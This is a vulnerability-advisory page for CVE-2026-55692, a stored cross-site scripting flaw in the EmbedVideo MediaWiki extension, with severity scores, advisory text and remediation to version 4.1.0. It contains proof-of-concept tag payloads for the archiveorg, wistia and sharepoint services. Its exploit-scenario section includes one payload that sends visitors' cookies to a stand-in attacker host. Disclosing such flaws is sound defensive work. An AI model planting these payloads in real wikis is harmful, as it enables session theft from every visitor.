Skip to main content

EmbedVideo Extension CVE-2026-55692

HIGH
Cross-site Scripting (XSS) (CWE-79)
2026-06-19 https://github.com/StarCitizenWiki/mediawiki-extensions-EmbedVideo GHSA-5c7p-g73q-rpg5
Microsoft XSS PHP
7.5
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
7.5 HIGH
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
vuln.today AI
6.4 MEDIUM

Network-reachable wiki edit endpoint (AV:N, AC:L); requires edit permission so PR:L not PR:N; autofocus removes UI; XSS executes in browser origin so S:C with C:L/I:L.

3.1 AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

Lifecycle Timeline

3
Source Code Evidence Fetched
Jun 19, 2026 - 23:36 vuln.today
Analysis Generated
Jun 19, 2026 - 23:36 vuln.today
CVE Published
Jun 19, 2026 - 21:41 github-advisory
HIGH 7.5

DescriptionGitHub Advisory

Summary

With $wgEmbedVideoRequireConsent enabled (the default), the urls for videos are stored in a json-ified data attributedata-mw-iframeconfig. When given a malformed url or id, the data-mw-iframeconfig attribute can be escaped via single quotes, allowing for html/javascript injection.

Details

The sprintf here adds the iframe config encoded as JSON here. When given a malicious url or id with a single quote, the $this->getUrl() call returns an unescaped payload that terminates the data-mw-iframeconfig attribute and allows for injecting attributes, including handlers, into the figure element. The id regex for the archiveorg service and the url regexes for the wistia and sharepoint services allow for single quotes to be introduced.

PoC

A couple of examples across services

Input:
<embedvideo service="archiveorg" id="x' onmouseover='alert(document.domain)' data-x='"></embedvideo>

Renders:
<figure class="embedvideo" data-service="archiveorg" data-mw-iframeconfig="{&quot;src&quot;:&quot;//archive.org/embed/x" onmouseover="alert(document.domain)" data-x="?autoplay=1&quot;}" style="width:640px">
<div class="embedvideo-wrapper" style="height:493px"><div class="embedvideo-consent" data-show-privacy-notice="1">
...
</div>
</figure>
Input:
{{#ev:wistia|https://wistia.com/medias/x'onmouseover='alert(document.domain)'}}

Renders:
<figure class="embedvideo" data-service="wistia" data-mw-iframeconfig="{&quot;src&quot;:&quot;//fast.wistia.net/embed/iframe/x" onmouseover="alert(document.domain)" ?autoplay="1&quot;}'" style="width:640px">
<div class="embedvideo-wrapper" style="height:360px"><div class="embedvideo-consent" data-show-privacy-notice="1">
...
</div>
</figure>
{{#ev:sharepoint|https://a.sharepoint.com/sites/x'onmouseover='alert(document.domain)'.aspx}}

Impact

Under the default $wgEmbedVideoRequireConsent = true configuration, any user able to edit a page can inject arbitrary JavaScript into an HTML event handler attribute (e.g. onfocus) via parameter. It requires no interaction (autofires via autofocus) and executes in the wiki origin for every visitor to the page.

AnalysisAI

Stored cross-site scripting in the StarCitizenWiki EmbedVideo MediaWiki extension (versions <= 4.0.0) allows any user with page-edit rights to inject arbitrary JavaScript into the data-mw-iframeconfig attribute by supplying a malformed URL or ID containing single quotes for the archiveorg, wistia, or sharepoint services. The flaw is present under the default $wgEmbedVideoRequireConsent=true configuration and executes in the wiki origin for every visitor that loads the affected page, with publicly available exploit code exists in the GHSA advisory.

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Obtain wiki edit access
Delivery
Craft embedvideo tag with single-quote breakout in archiveorg/wistia/sharepoint parameter
Exploit
Save page with poisoned data-mw-iframeconfig attribute
Execution
Victim loads rendered page
Persist
Autofocus handler fires injected JavaScript
Impact
Script executes in wiki origin, exfiltrating session or acting as victim
Sign in to reveal

Vulnerability AssessmentAI

Exploitation The extension must be installed at version 4.0.0 or earlier with the default $wgEmbedVideoRequireConsent=true setting; the attacker must hold edit rights on at least one page on the target wiki (the CVSS vector states PR:N but the description explicitly requires the ability to edit a page); the payload must be delivered through one of the three services whose input regexes allow a single quote - archiveorg (id parameter), wistia (url), or sharepoint (url); and exploitation succeeds only once a victim loads the rendered page in a browser, though no further user interaction is required because the injected autofocus handler auto-fires. Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N yields 7.5, but the published vector is internally inconsistent with the described attack: exploitation requires permission to edit a wiki page, so PR:N is optimistic and PR:L is more honest, while a stored XSS typically warrants S:C with C:L/I:L rather than C:H/I:N. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario A contributor on a wiki running EmbedVideo <= 4.0.0 edits any article and inserts `<embedvideo service="archiveorg" id="x' onfocus='fetch("//attacker/?c="+document.cookie)' autofocus='"></embedvideo>`, which is saved and rendered for every subsequent viewer. When victims load the page their browser parses the injected onfocus and autofocus attributes on the figure element, executing the attacker's JavaScript in the wiki origin without any victim interaction; the GHSA-published PoC demonstrates the same primitive against the wistia and sharepoint services as well.
Remediation Vendor-released patch: 4.1.0 - upgrade the Composer package starcitizenwiki/embedvideo to version 4.1.0 or later, which replaces the sprintf-based attribute assembly with a TemplateParser plus Html::element/Html::rawElement calls that perform proper HTML attribute encoding (commit 370156335b325bb81d14d89edf0a1f2643d50a84). … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

Within 24 hours: Identify all instances running EmbedVideo extension version 4.0.0 or earlier. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

More from same product – last 7 days

CVE-2026-9815 MEDIUM POC
6.5 Jun 18

Unrestricted PHP file upload in the MagicForm WordPress plugin (through version 0.1.3) enables unauthenticated remote co
CVE-2026-48908 CRITICAL
10.0 Jun 20

Remote unauthenticated arbitrary file upload in JoomShaper SP Page Builder extension for Joomla (versions 1.0.0 through

CVE-2026-48939 CRITICAL
10.0 Jun 20

Arbitrary PHP file upload in the iCagenda extension for Joomla enables remote unauthenticated attackers to abuse the eve
CVE-2025-69108 CRITICAL
9.8 Jun 16

Unauthenticated PHP Object Injection in the ThemeREX Hot Coffee WordPress theme (versions ≤ 1.7) allows remote attackers
CVE-2025-69122 CRITICAL
9.8 Jun 16

Unauthenticated PHP Object Injection in the ThemeREX SeaFood Company WordPress theme (versions ≤1.4) enables remote atta

Share

CVE-2026-55692 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy